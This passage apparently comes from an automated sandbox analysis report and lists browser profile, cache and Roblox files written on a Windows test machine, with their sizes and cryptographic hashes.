                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                    Filesize

                                                                                                    3KB

                                                                                                    MD5

                                                                                                    5bd47ffbef417c556977b5f4b70b866c

                                                                                                    SHA1

                                                                                                    44e67ba13e6688062597ba11c4520d9c069c87bf

                                                                                                    SHA256

                                                                                                    9efa150096ed1f0e56598b73a396f54b201fc40209e1d9ba5608419c7569aff6

                                                                                                    SHA512

                                                                                                    d781bd2265754780849e433e936e78de8d911e2390fc3ab5028ff82df71feb18807593d119ce2a42c7eeb3482619744315bacde3718815d225e2ece8abe54810

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                    MD5

                                                                                                    338dd016518bddd70d809b41b103cf42

                                                                                                    SHA1

                                                                                                    cfcd908111e210f3962c0a6e7e5395586baa9954

                                                                                                    SHA256

                                                                                                    7d61dcf2bdeaa1f9c5f47cc9f41934d8c5b75f5cbefd51e714e81ee321ae00fb

                                                                                                    SHA512

                                                                                                    6b6953ebf2d7e66f0a4cfa1498c766c9d827f7a06ddb685a90b0989dc137ee9f84b79a68c72db896647139b7118ebfb30f9658213d80463fa0cd8071fe4f5729

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                    Filesize

                                                                                                    1KB

                                                                                                    MD5

                                                                                                    7a0df07116f1c2d7c62fb2f2d600df0b

                                                                                                    SHA1

                                                                                                    13bc774bfdf5071130bdc28e8569da2babfac6ac

                                                                                                    SHA256

                                                                                                    2833f628e92f2f5a49c5abe54b14caf73936d7ef3a05ffb6efc5683a9f73b880

                                                                                                    SHA512

                                                                                                    2c7c31e79f4e94537899597fdcdaf5ade3c097d3a696a41c88b8b737eaa4d43d7eafd164054b781b94b3bc33508de12ea6e19521fa73ce0e15300e596c03a1b2

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                    MD5

                                                                                                    ee0b397fb19a55772b9fc287217255c7

                                                                                                    SHA1

                                                                                                    a308a99f45f9f57edf3e58d701142b289ee2fc63

                                                                                                    SHA256

                                                                                                    6dd54efb791bd6d47a1be46dc77fc40437c9fcd00edbc94445be3f53ce655205

                                                                                                    SHA512

                                                                                                    a413f8e32c519d526607217d2210cbb27f9a0b9899e5c2d10b8fca05fc63c2df76335b9706d0afedd1b7f4a7fee2a92cb8f48fed0b5cba88fd5ef6c496de2d53

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL

                                                                                                    Filesize

                                                                                                    36KB

                                                                                                    MD5

                                                                                                    2629dad2403bf9edb09c6f0d95b5d49e

                                                                                                    SHA1

                                                                                                    f75b0d81cf5a0fbf967a7c40a41938f8a041d3e5

                                                                                                    SHA256

                                                                                                    84eb473e3038816604cf84bc70c2d9b958a9a3f3d296fb1661990465b9a07618

                                                                                                    SHA512

                                                                                                    50d52e7bb436addb4b212bc4d99a56f7adb6d27fd4e133cdd58836a19217886f046a7f4954b05f8166cb993102a93da59b0ffe44a5178ec170b9eab4c6b0fa44

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                    Filesize

                                                                                                    371B

                                                                                                    MD5

                                                                                                    9e0c5a4f9de3a9ba3e90d6d68ad4a277

                                                                                                    SHA1

                                                                                                    3ee11b6d5aac56269964b334cfdc9e2dbfe6485e

                                                                                                    SHA256

                                                                                                    c796600806e6fec8bfc4084279b3f14fcf68a03b51fcd45735b51e2416babe20

                                                                                                    SHA512

                                                                                                    30c8806734d6effc658e90fd1845bda71f678c154e889454e91abd758ed197397c193f6e53eaf97675d6e397ef8d515af0c9951797dfeb2981b7ed2a3b598acf

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                    Filesize

                                                                                                    1KB

                                                                                                    MD5

                                                                                                    7a03b76c92d38ad3e4f8be1625f4254c

                                                                                                    SHA1

                                                                                                    fd2d5d2a80f0d3e68a6990ef1096c297c0631684

                                                                                                    SHA256

                                                                                                    48d87a640dcb20d7517a7d8fa8f5cb4a43c0c663e60c27df8cfd53b587fd2a08

                                                                                                    SHA512

                                                                                                    7da7db7e510373ce02f062bc5f2e6a37d077c3b98db0c2e7f5b7f5550e9c8a3d342a9e2eb24ffd7d4e3da31e79091f94231abdb639d5b6c012e539861469b4f9

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                    Filesize

                                                                                                    371B

                                                                                                    MD5

                                                                                                    ee3f6b95c9c21863f7ee0ca6417f6e19

                                                                                                    SHA1

                                                                                                    7655d12fb76110d7e4b79c2ffb9d55785c0908e6

                                                                                                    SHA256

                                                                                                    211ab4e3e5d2fd74b22b5e9b8653e77a831310ff3fcb739fc1cdb4ddd55511af

                                                                                                    SHA512

                                                                                                    d5431fe7c8ad02372d058727c06cf63436baa7c2c11c16e2d5560b60c2901636f3385d5d18263acf49da722eae5e7e6648e58f439a967201731b721b97709cc8

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                    Filesize

                                                                                                    1KB

                                                                                                    MD5

                                                                                                    37ad674d330c26b91d60be343081f6c2

                                                                                                    SHA1

                                                                                                    d0fdd3963764cf44de2a5be18d5ae51730ddbb12

                                                                                                    SHA256

                                                                                                    c06a7fe4d74dc0501b939e5ce140077715949d03ff848a0711b68a3720e2731c

                                                                                                    SHA512

                                                                                                    28a868919f73e8ee1afe8ec899a474877d8f25c7fcdd8b04e2c0f21181cb468db810a66519fb82510f4429ec9413bf80bbf3c72bf6aa82c6eeaafa996ddd66ac

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                    Filesize

                                                                                                    2KB

                                                                                                    MD5

                                                                                                    66d91b7e8c759fa68affb9d5270f0b54

                                                                                                    SHA1

                                                                                                    2bc97384923d5f8397cb91583ca9de54c1795cb4

                                                                                                    SHA256

                                                                                                    60e4807e5cdfc19e4a283b57712eb0bb1adc2250d87be9fca7df4fbebf2d7fe0

                                                                                                    SHA512

                                                                                                    6443687ac040d713a4402a43fa151f502eb3e03dbff1ef724827e3e0ab2740d115a1da3db2dfba96c6c84c60349fb0f8d081c25f9543688a87f39b937c096d45

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                    Filesize

                                                                                                    2KB

                                                                                                    MD5

                                                                                                    76e5e7d5b5f068bafc6f14345b3c04ba

                                                                                                    SHA1

                                                                                                    c761c19738faa2118dfbefa28bf5237449fcdd8a

                                                                                                    SHA256

                                                                                                    36b3411e90f739b99b3be4c8a8af96c8569ccbd30ae39f33cb386b3d4644659d

                                                                                                    SHA512

                                                                                                    91e78746352a2a258ec45969421188e98e745614bc8f68216965ff1dcc60505c0765cfe2528de073f7a15e98978e3c5976eef2034f38ae36f83914420f454adf

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                    Filesize

                                                                                                    2KB

                                                                                                    MD5

                                                                                                    fa4cf96bf30c1fa3ecb01dce1ef65bbd

                                                                                                    SHA1

                                                                                                    6681bd8d85bc3b8525581f8092fb5006048858c1

                                                                                                    SHA256

                                                                                                    ba58d04d6995f837e07ad713d1b56507942ee5a0d0f5ea1ec2e5bf86c57fe12d

                                                                                                    SHA512

                                                                                                    863989202a0373fba4d1d0f5ae41ee698d2cb12c4c0e455be50237590a8b60a44ce4ce1492f8327685ea077733ae48d272d23052f31e57c972195080411c5311

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                    Filesize

                                                                                                    2KB

                                                                                                    MD5

                                                                                                    b91fc70ca155ee2b181dcaf94764a55f

                                                                                                    SHA1

                                                                                                    b8cd8799a470ea10fb7ba934770a97cd3dd21352

                                                                                                    SHA256

                                                                                                    bc1ac9161722a4490ce574072840f161ad9825cb3a9388237cfd442847772c0d

                                                                                                    SHA512

                                                                                                    cdff7d47db3bcf9d5a6aedaf08dc7ff6f66daea38d12554fd510bfb5e589fe19e067c232b8743e572d8c1db8c35cfa0ad378e4bb4ca35b81beedb37e11df75bc

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                    Filesize

                                                                                                    371B

                                                                                                    MD5

                                                                                                    173252897a5d9d02a02cc3faa123a33f

                                                                                                    SHA1

                                                                                                    d5b53678fc264f8e200cbadd83c322774a31dfe2

                                                                                                    SHA256

                                                                                                    b7baeb71d5cd24d5228695f5a6c8b4e852a3de438a15e1b518808d1c4d8c3ecc

                                                                                                    SHA512

                                                                                                    557ef62fdaee40236521f57e535dfb997a57c7ea1592461f7d929fd59c64d35023e076dd9379026e1eb3fc7a5f6611ef2aad467544138810a7d8745deffc7085

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                    Filesize

                                                                                                    1KB

                                                                                                    MD5

                                                                                                    8f97cc146eb8551c353c114ecd0e2245

                                                                                                    SHA1

                                                                                                    ce9af6085d65856f60b8a7bb533ec07adfa12007

                                                                                                    SHA256

                                                                                                    12b50f3167a3397a503a69beb4324c70637ea62c48c741b689efccf35f6a3557

                                                                                                    SHA512

                                                                                                    f9392892d34fb69efb287d746b2242cdf4be0a7fb206245df9349499c5e17e62ff5cd5b4b73760aedfa7f65a247aab1891af4eb24a4ccfbe41b66b9988600940

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                    Filesize

                                                                                                    1KB

                                                                                                    MD5

                                                                                                    9a8afc094f7947eaea65d3e3f5edd740

                                                                                                    SHA1

                                                                                                    5c8a4c687120c9ed34b578e7fdabd6d4bf3dfa16

                                                                                                    SHA256

                                                                                                    d3a71c1c5d613cd6407784e1c0354583f5e33e81ff6506ee77648ffd025ac841

                                                                                                    SHA512

                                                                                                    6628b81820747c7500e676f252f3d3f1128b5bd5cdaa0e515689a38121e7cffcf17e5d826c08857b7ce6dcc959045cd89fe8a5360c5b9b87942f61fb6d99c3d3

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                    Filesize

                                                                                                    1KB

                                                                                                    MD5

                                                                                                    c536da5241b3e093391ff8917adb4f3a

                                                                                                    SHA1

                                                                                                    9b8a750a72e7a9a90e2b88fdf9642be57b422b47

                                                                                                    SHA256

                                                                                                    fe81309b93f7c2732ce53818eea6a0f4825626733ba28b36723a17d626ff8e71

                                                                                                    SHA512

                                                                                                    42f8337cd4ef7be6282141b2eac34d152067d718a8644679b4bb93dcf2aa1c2cdaac25686cf7cf5466bdeb61ad3244bbf9577e01d0d593716b361129426d09b6

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                    Filesize

                                                                                                    7KB

                                                                                                    MD5

                                                                                                    1ff30687ce59523fd3c04a18fcca29f4

                                                                                                    SHA1

                                                                                                    d99c08ce20f10eca5749ae71530c92494980244a

                                                                                                    SHA256

                                                                                                    be085fdc44f1c5eab4ba02e6253cc05494670a001327a25156b11e164949a8e2

                                                                                                    SHA512

                                                                                                    afc74998a2145f482a21fd9d1a38f3bfd91f7b06bd596614170c25c5658ff4cc4c978cc128343c59e86180e9ab053b9202443ed999c0025c06f72f4e0b26b7ce

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                    Filesize

                                                                                                    7KB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                    Filesize

                                                                                                    5KB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                    Filesize

                                                                                                    6KB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                    Filesize

                                                                                                    5KB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                    Filesize

                                                                                                    6KB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                    Filesize

                                                                                                    7KB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                    Filesize

                                                                                                    7KB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                    Filesize

                                                                                                    12KB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

                                                                                                    Filesize

                                                                                                    213B

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG

                                                                                                    Filesize

                                                                                                    317B

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG

                                                                                                    Filesize

                                                                                                    348B

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                    Filesize

                                                                                                    324B

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

                                                                                                    Filesize

                                                                                                    940B

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG

                                                                                                    Filesize

                                                                                                    317B

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                    Filesize

                                                                                                    889B

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                    Filesize

                                                                                                    335B

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

                                                                                                    Filesize

                                                                                                    44KB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

                                                                                                    Filesize

                                                                                                    264KB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3

                                                                                                    Filesize

                                                                                                    4.0MB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

                                                                                                    Filesize

                                                                                                    14B

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                    Filesize

                                                                                                    289KB

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                                                                                    Filesize

                                                                                                    111KB

                                                                                                    MD5

                                                                                                    406ac467f0149f72e8c1f05c09fa402e

                                                                                                    SHA1

                                                                                                    2286efa38ee76150ee148f65621e67b786d387ad

                                                                                                    SHA256

                                                                                                    65dfc8831474e12e1a8db5ca5a26fff0f3d52916d557f59b743957f67e14954e

                                                                                                    SHA512

                                                                                                    71971c0978d306ca1b5b306afb7984ed6334699c0cbe81cf85a95e64db733b309e04e67c68ac735d26b16202ae37ad3ddd741d5733fc8f5ec56c42ef58597727

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                                                                                    Filesize

                                                                                                    105KB

                                                                                                    MD5

                                                                                                    aedf06ecb50fa71102e5498d624a7565

                                                                                                    SHA1

                                                                                                    7a796f6382e99449b50610d67393fe5f8d4aff52

                                                                                                    SHA256

                                                                                                    362cbaa627a6a073d517d0f76ae7f1109efc25f601b764e47f0735daac6aaf6f

                                                                                                    SHA512

                                                                                                    023bf48dc2151383c5c510f7decddfc4de12785c8faa27272a928823e991f774866c993ab3beaebbee8bc28c76f501753d5a1889d4349c64f0f087d47db8a2ac

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe59cb55.TMP

                                                                                                    Filesize

                                                                                                    93KB

                                                                                                    MD5

                                                                                                    69731a4a1dbb74437bc28af549a9eaa5

                                                                                                    SHA1

                                                                                                    c024ea7bb3372f45cc64123c8956651ac90ebedc

                                                                                                    SHA256

                                                                                                    13b60ca4336678c504f0bff76a32801b73321de88ebfe41c28679ebb0009063d

                                                                                                    SHA512

                                                                                                    5a8d6937a89c34bdd8504c29b680546f5dc0086f297bb2b535e9cf5771181fb412444f4059f1dbf8974c7622187daaa0cf4a9a34553c1dd0f24aca139377c097

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

                                                                                                    Filesize

                                                                                                    85B

                                                                                                    MD5

                                                                                                    bc6142469cd7dadf107be9ad87ea4753

                                                                                                    SHA1

                                                                                                    72a9aa05003fab742b0e4dc4c5d9eda6b9f7565c

                                                                                                    SHA256

                                                                                                    b26da4f8c7e283aa74386da0229d66af14a37986b8ca828e054fc932f68dd557

                                                                                                    SHA512

                                                                                                    47d1a67a16f5dc6d50556c5296e65918f0a2fcad0e8cee5795b100fe8cd89eaf5e1fd67691e8a57af3677883a5d8f104723b1901d11845b286474c8ac56f6182

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\e808d71e-1f2c-4440-b01f-e8c4465f5b0d.tmp

                                                                                                    Filesize

                                                                                                    157KB

                                                                                                    MD5

                                                                                                    f833008e5731462860c015c995973009

                                                                                                    SHA1

                                                                                                    d8f5382200c7cbbe1b4d29190ef57ad55292b2e6

                                                                                                    SHA256

                                                                                                    8fb8196d0fac9270c07bc3dd5b434660e674276ebe7b402071f88d95ce42ab29

                                                                                                    SHA512

                                                                                                    b14a03667943261ce0681d23abe26bf326927d385351ff51592cd62fd74f7c1fd1715ee0848bbe26d318e64cfdaad173e158a9de56d1c49fc39615407bc4147b

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

                                                                                                    Filesize

                                                                                                    2B

                                                                                                    MD5

                                                                                                    99914b932bd37a50b983c5e7c90ae93b

                                                                                                    SHA1

                                                                                                    bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                    SHA256

                                                                                                    44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                    SHA512

                                                                                                    27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\V28C7N3J\edgecompatviewlist[1].xml

                                                                                                    Filesize

                                                                                                    74KB

                                                                                                    MD5

                                                                                                    d4fc49dc14f63895d997fa4940f24378

                                                                                                    SHA1

                                                                                                    3efb1437a7c5e46034147cbbc8db017c69d02c31

                                                                                                    SHA256

                                                                                                    853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

                                                                                                    SHA512

                                                                                                    cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

                                                                                                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DFE8A849A3C70D9446.TMP

                                                                                                    Filesize

                                                                                                    16KB

                                                                                                    MD5

                                                                                                    5a977b11d547429ce65a3debfe115ff8

                                                                                                    SHA1

                                                                                                    fe174e5161f76594b143bfd6428d5e259fb996ba

                                                                                                    SHA256

                                                                                                    00a0c27e9cfcd39338c28b3a80a3d41ebc73b8f47320c588823ad3e75fe61341

                                                                                                    SHA512

                                                                                                    369a2a2097618108dc5547bfc6a404003d5f8ff795904afe0cff85e886d089c22724124dba130ff7ae4ede0575e45d8b56a632cd56e153999621338a29478cbe

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\Downloads\roblox-player\071a86a82f51e91c9a47bb2db7499e0c

                                                                                                    Filesize

                                                                                                    5.8MB

                                                                                                    MD5

                                                                                                    071a86a82f51e91c9a47bb2db7499e0c

                                                                                                    SHA1

                                                                                                    d583e6fc19ddf59a70b7f3898fb1b1933504cfeb

                                                                                                    SHA256

                                                                                                    15ce1bdd1a117d0a755f8f77e5a789ccf171cfd0c56bb7532ac8cad8c35de692

                                                                                                    SHA512

                                                                                                    1345b189bfc4c5a7eb9c6397efb2d9d19a6498b6e4da03e5b2fee3904c2ce914b3d4ea7f80958dfd5946fb92ab1c45b262f81a029a7302237b96575c94160dbe

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Crashpad\settings.dat

                                                                                                    Filesize

                                                                                                    280B

                                                                                                    MD5

                                                                                                    f6d8cc0cbb2389c58d50fd287e8c0c3d

                                                                                                    SHA1

                                                                                                    d03b19066113b2ebad2dce212e9b3d0ecd703024

                                                                                                    SHA256

                                                                                                    9729a21d9de42b6a09772bbc51d38073536f380551dc1200a97365c090e8f21b

                                                                                                    SHA512

                                                                                                    7cc58bf88f66e35019c4ab38f5aff3d10757b78c266a0aa625b99a74abf6e17b303c7f6fdb77a540e194655ccd6ede2511cdaa52567edd1b8646dbe229345508

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Cache\Cache_Data\f_00000c

                                                                                                    Filesize

                                                                                                    39KB

                                                                                                    MD5

                                                                                                    e1f6e032096b2924e561c3928b9dc73d

                                                                                                    SHA1

                                                                                                    f33a3bb1b04f04ed1b93b13d21b6b3ce529690ad

                                                                                                    SHA256

                                                                                                    fa802b853572d8a40ee939940d0cd9562ea8f5954c0522b0777e01fcb546c3c8

                                                                                                    SHA512

                                                                                                    b13f6e1f984d28c5f4cfc4ae2298b321c314892cab1e5ccd6f1f61ec98d8c1a39669078c88ba541c91648963abc6e16e0a1cdb4e9449b4be16927e9bad8d0f37

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Cache\Cache_Data\f_000012

                                                                                                    Filesize

                                                                                                    147KB

                                                                                                    MD5

                                                                                                    759ab24cf5846f06c5cdb324ee4887ea

                                                                                                    SHA1

                                                                                                    41969c5b737bc40bbb54817da755e3aa7d02f3c6

                                                                                                    SHA256

                                                                                                    7037e6c967c38477a5fcd583c74892e16b7a9066cd60287c7035bf0760d05471

                                                                                                    SHA512

                                                                                                    3470ae07eb7c54feee1e791e63a365cfb0da42f570a66e6c84faf5db6bf8395173c6cb60e8c5cf28eae409f26ea5433c3c5d6ea32eb07e5997c979c6e3ccf4be

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Cache\Cache_Data\f_000018

                                                                                                    Filesize

                                                                                                    42KB

                                                                                                    MD5

                                                                                                    b715a5dd019d1b8771a3031ff85c972b

                                                                                                    SHA1

                                                                                                    5768744eb85d3137d094458e4b7842c1c5c526cd

                                                                                                    SHA256

                                                                                                    e9ca7a8587bb3674824a28a8a80836e3483dc3bbe97c658bf7c984c5b424920a

                                                                                                    SHA512

                                                                                                    22e09e48a13ced3a3cd95a5f40b5e9ccbbad8abbd0d6af7dd4e411d63c662b09f1ad2453909a6c7a0d0ce34f250f2fbf0d7f076dced281f133ab7f21d2008d1a

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Cache\Cache_Data\f_00001a

                                                                                                    Filesize

                                                                                                    42KB

                                                                                                    MD5

                                                                                                    cc7ad65e0558327d8fbe8ade40ab94e8

                                                                                                    SHA1

                                                                                                    6c153e9bf971f196db25cb2cb3b62f77f0a1299a

                                                                                                    SHA256

                                                                                                    956e1fd407995ff1ecca3bf42ca0d01086edc7eb6a965e1d9d4a48f197a8bd30

                                                                                                    SHA512

                                                                                                    0af63a7bb1151ef7564472b90ddd766857e3fd78973195817aa751d97093558688733876114ea7341063c7f1bc01f90aba1016980ce2c009a0cc399f40614377

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Network\SCT Auditing Pending Reports

                                                                                                    Filesize

                                                                                                    2B

                                                                                                    MD5

                                                                                                    d751713988987e9331980363e24189ce

                                                                                                    SHA1

                                                                                                    97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                    SHA256

                                                                                                    4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                    SHA512

                                                                                                    b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Sync Data\LevelDB\CURRENT

                                                                                                    Filesize

                                                                                                    16B

                                                                                                    MD5

                                                                                                    46295cac801e5d4857d09837238a6394

                                                                                                    SHA1

                                                                                                    44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                    SHA256

                                                                                                    0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                    SHA512

                                                                                                    8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Sync Data\LevelDB\MANIFEST-000001

                                                                                                    Filesize

                                                                                                    41B

                                                                                                    MD5

                                                                                                    5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                    SHA1

                                                                                                    d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                    SHA256

                                                                                                    f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                    SHA512

                                                                                                    de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\GrShaderCache\data_0

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                    MD5

                                                                                                    cf89d16bb9107c631daabf0c0ee58efb

                                                                                                    SHA1

                                                                                                    3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

                                                                                                    SHA256

                                                                                                    d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

                                                                                                    SHA512

                                                                                                    8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\GrShaderCache\data_2

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                    MD5

                                                                                                    0962291d6d367570bee5454721c17e11

                                                                                                    SHA1

                                                                                                    59d10a893ef321a706a9255176761366115bedcb

                                                                                                    SHA256

                                                                                                    ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                                                                                                    SHA512

                                                                                                    f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\GrShaderCache\data_3

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                    MD5

                                                                                                    41876349cb12d6db992f1309f22df3f0

                                                                                                    SHA1

                                                                                                    5cf26b3420fc0302cd0a71e8d029739b8765be27

                                                                                                    SHA256

                                                                                                    e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                                                                                                    SHA512

                                                                                                    e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Local State

                                                                                                    Filesize

                                                                                                    1KB

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Local State

                                                                                                    Filesize

                                                                                                    3KB

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Local State

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Local State~RFe6072b3.TMP

                                                                                                    Filesize

                                                                                                    1KB

                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\datareporting\glean\db\data.safe.bin

                                                                                                    Filesize

                                                                                                    2KB

                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\datareporting\glean\pending_pings\99e4d963-f29b-4b2f-8894-469988feca3c

                                                                                                    Filesize

                                                                                                    10KB

                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\datareporting\glean\pending_pings\bfef07aa-4682-4211-a32b-8e0f2c251d8d

                                                                                                    Filesize

                                                                                                    746B

                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\prefs-1.js

                                                                                                    Filesize

                                                                                                    6KB

